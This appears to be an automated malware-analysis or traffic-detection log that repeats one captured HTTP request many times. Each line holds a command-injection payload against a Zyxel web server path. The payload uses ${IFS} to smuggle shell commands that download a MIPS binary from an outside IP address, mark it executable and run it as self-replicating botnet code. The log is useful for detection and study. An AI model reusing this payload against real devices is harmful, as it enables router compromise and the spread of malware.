            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
